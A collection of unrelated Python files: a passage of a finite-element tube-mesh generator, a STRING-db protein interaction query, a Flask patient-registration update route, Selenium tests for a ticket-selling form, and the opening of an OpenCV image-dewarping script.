flatElementtemplate1.defineField(flatCoordinates, -1, eftFlat1)
flatElementtemplate2 = mesh.createElementtemplate()
flatElementtemplate2.setElementShapeType(Element.SHAPE_TYPE_CUBE)
flatElementtemplate2.defineField(flatCoordinates, -1, eftFlat2)
if xOrgan:
# Organ coordinates field
bicubichermitelinear = eftfactory_bicubichermitelinear(mesh, useCrossDerivatives)
eftOrgan = bicubichermitelinear.createEftBasic()
organCoordinates = findOrCreateFieldCoordinates(fm, name=organCoordinateFieldName)
organNodetemplate = nodes.createNodetemplate()
organNodetemplate.defineField(organCoordinates)
organNodetemplate.setValueNumberOfVersions(organCoordinates, -1, Node.VALUE_LABEL_VALUE, 1)
organNodetemplate.setValueNumberOfVersions(organCoordinates, -1, Node.VALUE_LABEL_D_DS1, 1)
organNodetemplate.setValueNumberOfVersions(organCoordinates, -1, Node.VALUE_LABEL_D_DS2, 1)
if useCrossDerivatives:
organNodetemplate.setValueNumberOfVersions(organCoordinates, -1, Node.VALUE_LABEL_D2_DS1DS2, 1)
organElementtemplate = mesh.createElementtemplate()
organElementtemplate.setElementShapeType(Element.SHAPE_TYPE_CUBE)
organElementtemplate.defineField(organCoordinates, -1, eftOrgan)
# Create nodes
# Coordinates field
for n in range(len(x)):
node = nodes.createNode(nodeIdentifier, nodetemplate)
cache.setNode(node)
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, x[n])
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS1, 1, d1[n])
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS2, 1, d2[n])
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS3, 1, d3[n])
if useCrossDerivatives:
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS2, 1, zero)
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS3, 1, zero)
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS2DS3, 1, zero)
coordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D3_DS1DS2DS3, 1, zero)
# print('NodeIdentifier = ', nodeIdentifier, x[n], d1[n], d2[n])
nodeIdentifier = nodeIdentifier + 1
# Flat coordinates field
if xFlat:
nodeIdentifier = firstNodeIdentifier
for n2 in range(elementsCountAlong + 1):
for n3 in range(elementsCountThroughWall + 1):
for n1 in range(elementsCountAround):
i = n2*(elementsCountAround + 1)*(elementsCountThroughWall + 1) + (elementsCountAround + 1)*n3 + n1
node = nodes.findNodeByIdentifier(nodeIdentifier)
node.merge(flatNodetemplate2 if n1 == 0 else flatNodetemplate1)
cache.setNode(node)
# print('NodeIdentifier', nodeIdentifier, 'version 1, xList Index =', i+1)
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, xFlat[i])
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS1, 1, d1Flat[i])
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS2, 1, d2Flat[i])
if useCrossDerivatives:
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS2, 1, zero)
if n1 == 0:
# print('NodeIdentifier', nodeIdentifier, 'version 2, xList Index =', i+elementsCountAround+1)
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 2, xFlat[i+elementsCountAround])
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS1, 2, d1Flat[i+elementsCountAround])
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS2, 2, d2Flat[i+elementsCountAround])
if useCrossDerivatives:
flatCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS2, 2, zero)
nodeIdentifier = nodeIdentifier + 1
# Organ coordinates field
if xOrgan:
nodeIdentifier = firstNodeIdentifier
for n in range(len(xOrgan)):
node = nodes.findNodeByIdentifier(nodeIdentifier)
node.merge(organNodetemplate)
cache.setNode(node)
organCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, xOrgan[n])
organCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS1, 1, d1Organ[n])
organCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D_DS2, 1, d2Organ[n])
if useCrossDerivatives:
organCoordinates.setNodeParameters(cache, -1, Node.VALUE_LABEL_D2_DS1DS2, 1, zero)
nodeIdentifier = nodeIdentifier + 1
# create elements
elementtemplate3 = mesh.createElementtemplate()
elementtemplate3.setElementShapeType(Element.SHAPE_TYPE_CUBE)
radiansPerElementAround = math.pi*2.0 / elementsCountAround
allAnnotationGroups = []
if closedProximalEnd:
# Create apex
for e3 in range(elementsCountThroughWall):
for e1 in range(elementsCountAround):
va = e1
vb = (e1 + 1) % elementsCountAround
eft1 = eftfactory.createEftShellPoleBottom(va * 100, vb * 100)
elementtemplate3.defineField(coordinates, -1, eft1)
element = mesh.createElement(elementIdentifier, elementtemplate3)
bni1 = e3 + 1
bni2 = elementsCountThroughWall + 1 + elementsCountAround*e3 + e1 + 1
bni3 = elementsCountThroughWall + 1 + elementsCountAround*e3 + (e1 + 1) % elementsCountAround + 1
nodeIdentifiers = [bni1, bni2, bni3, bni1 + 1, bni2 + elementsCountAround, bni3 + elementsCountAround]
element.setNodesByIdentifier(eft1, nodeIdentifiers)
# set general linear map coefficients
radiansAround = e1 * radiansPerElementAround
radiansAroundNext = ((e1 + 1) % elementsCountAround) * radiansPerElementAround
scalefactors = [
-1.0,
math.sin(radiansAround), math.cos(radiansAround), radiansPerElementAround,
math.sin(radiansAroundNext), math.cos(radiansAroundNext), radiansPerElementAround,
math.sin(radiansAround), math.cos(radiansAround), radiansPerElementAround,
math.sin(radiansAroundNext), math.cos(radiansAroundNext), radiansPerElementAround
]
result = element.setScaleFactors(eft1, scalefactors)
elementIdentifier = elementIdentifier + 1
annotationGroups = annotationGroupsAround[e1] + annotationGroupsAlong[0] + \
annotationGroupsThroughWall[e3]
if annotationGroups:
allAnnotationGroups = mergeAnnotationGroups(allAnnotationGroups, annotationGroups)
for annotationGroup in annotationGroups:
meshGroup = annotationGroup.getMeshGroup(mesh)
meshGroup.addElement(element)
# Create regular elements
now = elementsCountAround * (elementsCountThroughWall + 1)
for e2 in range(1 if closedProximalEnd else 0, elementsCountAlong):
for e3 in range(elementsCountThroughWall):
for e1 in range(elementsCountAround):
if closedProximalEnd:
bni11 = (e2-1) * now + e3 * elementsCountAround + e1 + 1 + (elementsCountThroughWall + 1)
bni12 = (e2-1) * now + e3 * elementsCountAround + (e1 + 1) % elementsCountAround + 1 + \
(elementsCountThroughWall + 1)
bni21 = (e2-1) * now + (e3 + 1) * elementsCountAround + e1 + 1 + (elementsCountThroughWall + 1)
bni22 = (e2-1) * now + (e3 + 1) * elementsCountAround + (e1 + 1) % elementsCountAround + 1 + \
(elementsCountThroughWall + 1)
else:
bni11 = e2 * now + e3 * elementsCountAround + e1 + 1
bni12 = e2 * now + e3 * elementsCountAround + (e1 + 1) % elementsCountAround + 1
bni21 = e2 * now + (e3 + 1) * elementsCountAround + e1 + 1
bni22 = e2 * now + (e3 + 1) * elementsCountAround + (e1 + 1) % elementsCountAround + 1
nodeIdentifiers = [bni11, bni12, bni11 + now, bni12 + now, bni21, bni22, bni21 + now, bni22 + now]
onOpening = e1 > elementsCountAround - 2
element = mesh.createElement(elementIdentifier, elementtemplate)
element.setNodesByIdentifier(eft, nodeIdentifiers)
if xFlat:
element.merge(flatElementtemplate2 if onOpening else flatElementtemplate1)
element.setNodesByIdentifier(eftFlat2 if onOpening else eftFlat1, nodeIdentifiers)
if xOrgan:
element.merge(organElementtemplate)
element.setNodesByIdentifier(eftOrgan, nodeIdentifiers)
elementIdentifier = elementIdentifier + 1
annotationGroups = annotationGroupsAround[e1] + annotationGroupsAlong[e2] + \
annotationGroupsThroughWall[e3]
if annotationGroups:
allAnnotationGroups = mergeAnnotationGroups(allAnnotationGroups, annotationGroups)
for annotationGroup in annotationGroups:
meshGroup = annotationGroup.getMeshGroup(mesh)
meshGroup.addElement(element)
fm.endChange()
return nodeIdentifier, elementIdentifier, allAnnotationGroups
class CylindricalSegmentTubeMeshInnerPoints:
"""
Generates inner profile of a cylindrical segment for use by tubemesh.
"""
def __init__(self, elementsCountAround, elementsCountAlongSegment,
segmentLength, wallThickness, innerRadiusSegmentList, dInnerRadiusSegmentList, startPhase):
self._elementsCountAround = elementsCountAround
self._elementsCountAlongSegment = elementsCountAlongSegment
self._segmentLength = segmentLength
self._wallThickness = wallThickness
self._innerRadiusSegmentList = innerRadiusSegmentList
self._dInnerRadiusSegmentList = dInnerRadiusSegmentList
self._xiList = []
self._flatWidthList = []
self._startPhase = startPhase
def getCylindricalSegmentTubeMeshInnerPoints(self, nSegment):
# Unpack radius and rate of change of inner radius
startRadius = self._innerRadiusSegmentList[nSegment]
startRadiusDerivative = self._dInnerRadiusSegmentList[nSegment]
endRadius = self._innerRadiusSegmentList[nSegment+1]
endRadiusDerivative = self._dInnerRadiusSegmentList[nSegment+1]
xInner, d1Inner, d2Inner, transitElementList, xiSegment, flatWidthSegment, segmentAxis, radiusAlongSegmentList \
= getCylindricalSegmentInnerPoints(self._elementsCountAround, self._elementsCountAlongSegment,
self._segmentLength, self._wallThickness, startRadius,
startRadiusDerivative, endRadius, endRadiusDerivative,
self._startPhase)
startIdx = 0 if nSegment == 0 else 1
xi = xiSegment[startIdx:self._elementsCountAlongSegment + 1]
self._xiList += xi
flatWidth = flatWidthSegment[startIdx:self._elementsCountAlongSegment + 1]
self._flatWidthList += flatWidth
return xInner, d1Inner, d2Inner, transitElementList, segmentAxis, radiusAlongSegmentList
def getFlatWidthAndXiList(self):
return self._flatWidthList, self._xiList
def getCylindricalSegmentInnerPoints(elementsCountAround, elementsCountAlongSegment, segmentLength,
wallThickness, startRadius, startRadiusDerivative, endRadius, endRadiusDerivative,
startPhase):
"""
Generates a 3-D cylindrical segment mesh with variable numbers of elements
around, along the central path, and through wall.
:param elementsCountAround: Number of elements around.
:param elementsCountAlongSegment: Number of elements along cylindrical segment.
:param segmentLength: Length of a cylindrical segment.
:param wallThickness: Thickness of wall.
:param startRadius: Inner radius at proximal end.
:param startRadiusDerivative: Rate of change of inner radius at proximal end.
:param endRadius: Inner radius at distal end.
:param endRadiusDerivative: Rate of change of inner radius at distal end.
:param startPhase: Phase at start.
:return coordinates, derivatives on inner surface of a cylindrical segment.
:return transitElementList: stores true if element around is an element that
transits between a big and small element.
:return xiList: List of xi for each node around. xi refers to node position
along the width when cylindrical segment is opened into a flat preparation,
nominally in [0.0, 1.0].
:return flatWidthList: List of width around elements for each element
along cylindrical segment when the segment is opened into a flat preparation.
:return segmentAxis: Axis of segment.
:return sRadiusAlongSegment: radius of each element along segment.
"""
transitElementList = [0] * elementsCountAround
# create nodes
segmentAxis = [0.0, 0.0, 1.0]
xFinal = []
d1Final = []
d2Final = []
xiList = []
flatWidthList = []
sRadiusAlongSegment = []
for n2 in range(elementsCountAlongSegment + 1):
phase = startPhase + n2 * 360.0 / elementsCountAlongSegment
xi = (phase if phase <= 360.0 else phase - 360.0) / 360.0
radius = interp.interpolateCubicHermite([startRadius], [startRadiusDerivative],
[endRadius], [endRadiusDerivative], xi)[0]
sRadiusAlongSegment.append(radius)
z = segmentLength / elementsCountAlongSegment * n2 + startPhase / 360.0 * segmentLength
xLoop, d1Loop = createCirclePoints([0.0, 0.0, z], [radius, 0.0, 0.0], [0.0, radius, 0.0],
elementsCountAround, startRadians=0.0)
xFinal = xFinal + xLoop
d1Final = d1Final + d1Loop
# Smooth d2 for segment
smoothd2Raw = []
for n1 in range(elementsCountAround):
nx = []
nd2 = []
for n2 in range(elementsCountAlongSegment + 1):
n = n2 * elementsCountAround + n1
nx.append(xFinal[n])
nd2.append(segmentAxis)
smoothd2 = interp.smoothCubicHermiteDerivativesLine(nx, nd2)
smoothd2Raw.append(smoothd2)
# Re-arrange smoothd2
for n2 in range(elementsCountAlongSegment + 1):
radius = sRadiusAlongSegment[n2]
flatWidth = 2.0*math.pi*(radius + wallThickness)
flatWidthList.append(flatWidth)
xiFace = []
for n1 in range(elementsCountAround):
d2Final.append(smoothd2Raw[n1][n2])
for n1 in range(elementsCountAround + 1):
xi = 1.0/elementsCountAround * n1
xiFace.append(xi)
xiList.append(xiFace)
return xFinal, d1Final, d2Final, transitElementList, xiList, flatWidthList, segmentAxis, sRadiusAlongSegment
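# Hedged worked example of the phase-to-xi mapping above: with startPhase = 90
# and elementsCountAlongSegment = 4, faces sit at phases 90, 180, 270, 360, 450,
# giving xi = 0.25, 0.5, 0.75, 1.0, 0.25, so the interpolated radius repeats
# with the segment period as intended.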
|
# %%
import requests
# %%
def get_string_net(genes, score=800):
"""Query STRINGdb interactions endpoint"""
string_api_url = "https://string-db.org/api"
output_format = "tsv-no-header"
method = "network"
request_url = "/".join([string_api_url, output_format, method])
params = {
"identifiers": "%0d".join(genes),
"species": 9606,
"caller_identity": "www.jvfe.github.io",
"required_score": score,
}
response = requests.post(request_url, data=params)
return response
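# Note (hedged): following the STRING API convention used above, identifiers
# are joined with "%0d" (an encoded carriage return) and posted to
# https://string-db.org/api/tsv-no-header/network; a minimal call might be
# get_string_net(["TP53", "BRCA1"], score=900).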
# %%
with open("../data/dna_damage.txt", "r") as g:
genes = g.read().splitlines()
# %%
interactions = get_string_net(genes).text
with open("../results/interactions.tsv", "w") as res:
res.write(interactions)
|
from sharedData import *
changeRegister_api = Blueprint('changeRegister_api', __name__)
# user registration update
@changeRegister_api.route('/changeregister', methods=['GET', 'POST'])
def changeRegister():
global usersDataOnline
print("////////////////////////////////////////")
print("comeca change register")
print("usersDataOnline.getDictionary() = "+ str(usersDataOnline.getDictionary()))
userData = usersDataOnline.getUser(session['user'])
print("usersDataOnline.getDictionary() = "+ str(usersDataOnline.getDictionary()))
print("volta para change register")
    if userData is None:
        print("usersDataOnline.getUser(session['user']) is None")
if 'user' in session:
if not usersDataOnline.userIsOn(session['user']):
print("user has cookie but not logged, redirect to login")
userData = usuario.acessoUser()
#cursor
cur = connectionData.getConnector().cursor()
cur.execute("SELECT * FROM paciente WHERE cpf = %s",(session['user'],))
user = cur.fetchall()
userData.logginUser(user[0])
usersDataOnline.addUserOn(userData)
else:
session.pop('user', None)
return redirect('/logged')
user_list = userData.getStringList()
print("userData.getStringList() = "+ str(user_list))
cpf = user_list[2]
if request.method == 'POST':
# Fetch form data
userDetails = request.form
submit = userDetails['submit']
if (submit == "Enviar" ):
psd = userDetails['psd']
name = userDetails['name']
birth_date = userDetails['birth_date']
sex = userDetails['sex']
adress = userDetails['adress']
phone = userDetails['phone']
email = userDetails['email']
military = userDetails['military']
#cursor
cur = connectionData.getConnector().cursor()
#print(cpf +" "+ psd +" "+ saram +" "+ name +" "+ birth_date +" "+ sex +" "+ adress +" "+ phone +" "+ email +" "+ military)
hashed = bcrypt.hashpw(psd.encode(),bcrypt.gensalt(12))
hashedDecoded = hashed.decode('utf-8')
cur.execute("SELECT senha FROM paciente WHERE cpf = %s",(cpf,))
psd_db = cur.fetchall()
psd_db = psd_db[0][0]
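            # Hedged reading of the check below: bcrypt.hashpw(password, stored_hash)
            # re-hashes the submitted password with the salt embedded in the stored
            # hash, so a mismatch means the password actually changed; only then is
            # the senha column rewritten with the freshly salted hash.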
if (bcrypt.hashpw(psd.encode(),psd_db.encode()) != psd_db.encode() and len(psd) != 0):
cur.execute("UPDATE paciente SET senha=%s,nome=%s,dt_nasc=%s,sexo=%s,endereco=%s,telefone=%s,email=%s,militar=%s WHERE cpf=%s",(hashedDecoded,name,birth_date,sex,adress,phone,email,military,cpf))
else:
cur.execute("UPDATE paciente SET nome=%s,dt_nasc=%s,sexo=%s,endereco=%s,telefone=%s,email=%s,militar=%s WHERE cpf=%s",(name,birth_date,sex,adress,phone,email,military,cpf))
            # commit the transaction
connectionData.getConnector().commit()
cur.execute("SELECT * FROM paciente WHERE cpf = %s",(cpf,))
            # remove the user from the dictionary
cpf = session['user']
usersDataOnline.logoutUser(cpf)
userData = usuario.acessoUser()
user = cur.fetchall()
userData.logginUser(user[0])
usersDataOnline.addUserOn(userData)
print("ATUALIZAÇÃO DOS DADOS COM SUCESSO")
#close the cursor
cur.close()
return redirect('/logged')
return render_template('changeRegister.html',userDetails = user_list)
|
import pytest
from seleniumbase import BaseCase
from selenium.webdriver.common.keys import Keys
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User
from werkzeug.security import generate_password_hash, check_password_hash
"""
This file defines all unit tests for the frontend sell page.
"""
# Mock a sample user
test_user = User(
email='[email protected]',
name='test_sell',
password=generate_password_hash('TEST_frontend')
)
class FrontEndSellTest(BaseCase):
# Login to the profile for the purpose of testing functionality of sell form.
def login_to_profile(self):
# invalid any existing session
self.open(base_url + '/logout')
self.open(base_url + '/login')
# enter test user email and password
self.type("#email", "[email protected]")
self.type("#password", "TEST_frontend")
# click enter button
self.click('input[type="submit"]')
# R4.1 The name of the ticket has to be alphanumeric-only, and space allowed only if it is not the first or the last character.
@patch('qa327.backend.get_user', return_value=test_user)
def test_name_format(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid name and valid quantity, price and date
self.type("#sell-name", " TESTticket")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT, "31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid name and valid quantity, price and date
self.type("#sell-name", "TESTticket ")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid name and valid quantity, price and date
self.type("#sell-name", "TE_STticket")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.2 The name of the ticket is no longer than 60 characters
# R4.8 (optional) The name of the tickets has to contain at least 6 characters
@patch('qa327.backend.get_user', return_value=test_user)
def test_name_length(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid name and valid quantity, price and date
self.type("#sell-name", 6*"TESTticket1")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid name and valid quantity, price and date
self.type("#sell-name", "TEST1")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket1")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.3 The quantity of the tickets has to be more than 0, and less than or equal to 100.
@patch('qa327.backend.get_user', return_value=test_user)
def test_quantity(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid quantity and valid name, price and date
self.type("#sell-name", "TESTticket2")
self.type("#sell-quantity", "0")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid quantity and valid name, price and date
self.type("#sell-name", "TESTticket2")
self.type("#sell-quantity", "102")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket2")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.4 Price has to be of range [10, 100]
@patch('qa327.backend.get_user', return_value=test_user)
def test_price(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid price and valid name, quantity and date
self.type("#sell-name", "TESTticket3")
self.type("#sell-quantity", "50")
self.type("#sell-price", "0")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid price and valid name, quantity and date
self.type("#sell-name", "TESTticket3")
self.type("#sell-quantity", "50")
self.type("#sell-price", "102")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket3")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.5 Date must be given in the format YYYYMMDD (e.g. 20200901)
@patch('qa327.backend.get_user', return_value=test_user)
def test_date(self, *_):
# login to the profile
self.login_to_profile()
""" NEGATIVE """
# enter invalid date and valid name, price and quantity
self.type("#sell-name", "TESTticket4")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("201202", "12", "31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
""" POSITIVE """
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket4")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# R4.6 For any errors, redirect back to / and show an error message
@patch('qa327.backend.get_user', return_value=test_user)
def test_redirect(self, *_):
# login to the profile
self.login_to_profile()
# enter invalid name and valid date, price and quantity
self.type("#sell-name", "TEST_ticket5")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_title("Profile")
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid quantity and valid date, price and name
self.type("#sell-name", "TEST_ticket5")
self.type("#sell-quantity", "0")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_title("Profile")
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid price and valid name, quantity and date
self.type("#sell-name", "TESTticket5")
self.type("#sell-quantity", "50")
self.type("#sell-price", "0")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_title("Profile")
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# enter invalid date and valid name, price and quantity
self.type("#sell-name", "TESTticket5")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("201202", "12", "31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit failed
self.assert_title("Profile")
self.assert_element("#message_s")
self.assert_text("Ticket format invalid", "#message_s")
self.open(base_url)
# R4.7 The added new ticket information will be posted on the user profile page
@patch('qa327.backend.get_user', return_value=test_user)
def test_post_ticket(self, *_):
# login to the profile
self.login_to_profile()
# enter valid name, quantity, price and date
self.type("#sell-name", "TESTticket6")
self.type("#sell-quantity", "50")
self.type("#sell-price", "50")
date = self.find_element("#sell-date")
date.send_keys("2020", Keys.ARROW_RIGHT, "12", Keys.ARROW_RIGHT,"31")
self.click('input[value="Submit Selling Ticket"]')
# assert ticket submit succeed
self.assert_element("#message")
self.assert_text("Ticket successfully posted", "#message")
self.open(base_url)
# assert the ticket posted on profile page
self.assert_text("TESTticket6")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import sys
import numpy as np
import scipy.optimize
import matplotlib.pyplot as plt
import cv2
import ellipse
DEBUG_IMAGES = []
def debug_show(name, src):
global DEBUG_IMAGES
filename = 'debug{:02d}_{}.png'.format(len(DEBUG_IMAGES), name)
cv2.imwrite(filename, src)
h, w = src.shape[:2]
fx = w/1280.0
fy = h/700.0
f = 1.0/np.ceil(max(fx, fy))
if f < 1.0:
img = cv2.resize(src, (0, 0), None, f, f, cv2.INTER_AREA)
else:
img = src.copy()
DEBUG_IMAGES.append(img)
def translation(x, y):
return np.array([[1, 0, x], [0, 1, y], [0, 0, 1]], dtype=float)
def rotation(theta):
c = np.cos(theta)
s = np.sin(theta)
return np.array([[c, -s, 0], [s, c, 0], [0, 0, 1]], dtype=float)
def perspective_warp(a, b):
return np.array([[1, 0, 0], [0, 1, 0], [a, b, 1]], dtype=float)
def slant(sx):
return np.array([[1, sx, 0], [0, 1, 0], [0, 0, 1]], dtype=float)
def softmax(x, k=1.0):
b = x.max()
return np.log( np.exp(k*(x-b)).sum() ) / k + b
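# Hedged worked example: softmax here is a smooth maximum (log-sum-exp),
# shifted by b = x.max() for numerical stability. For x = [0, 1] and k = 1 it
# gives log(exp(0) + exp(1)) ~= 1.313, slightly above max(x); as k grows the
# value approaches max(x), e.g. k = 10 gives ~1.0000045.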
def skewed_widths(contours, H):
xvals = []
for c in contours:
pts = cv2.perspectiveTransform(c, H)
x = pts[:,:,0]
xvals.append( x.max() - x.min() )
xvals = np.array(xvals)
return softmax(xvals, 0.1)
def centered_warp(u0, v0, a, b):
return np.dot(translation(u0, v0),
np.dot(perspective_warp(a, b),
translation(-u0, -v0)))
def warp_containing_points(img, pts, H, border=4, shape_only=False):
'''
display = img.copy()
for pt in pts.reshape((-1,2)).astype(int):
cv2.circle(display, tuple(pt), 4, (255, 0, 0),
-1, cv2.LINE_AA)
debug_show('warp', display)
'''
pts2 = cv2.perspectiveTransform(pts, H)
x0, y0, w, h = cv2.boundingRect(pts2)
print('got bounding rect', x0, y0, w, h)
T = translation(-x0+border, -y0+border)
TH = np.dot(T, H)
if shape_only:
return (h+2*border, w+2*border), TH
else:
dst = cv2.warpPerspective(img, TH, (w+2*border, h+2*border),
borderMode=cv2.BORDER_REPLICATE)
return dst, TH
def conic_area_discrepancy(conics, x, H, opt_results=None):
areas = []
for conic in conics:
cx = ellipse.conic_transform(conic, H)
k, ab = ellipse.conic_scale(cx)
if np.isinf(ab):
areas.append(1e20)
else:
areas.append(ab)
areas = np.array(areas)
areas /= areas.mean() # rescale so mean is 1.0
areas -= 1 # subtract off mean
rval = 0.5*np.dot(areas, areas)
if opt_results is not None:
if not opt_results or rval < opt_results[-1][-1]:
opt_results.append( (x, H, rval) )
return rval
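# Hedged worked example: the discrepancy is 0.5 * ||A/mean(A) - 1||^2 over the
# warped ellipse areas A. Equal areas such as [2, 2, 2] give exactly 0, while
# [1, 3] normalises to [0.5, 1.5] and gives 0.5 * (0.25 + 0.25) = 0.25.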
def threshold(img):
if len(img.shape) > 2:
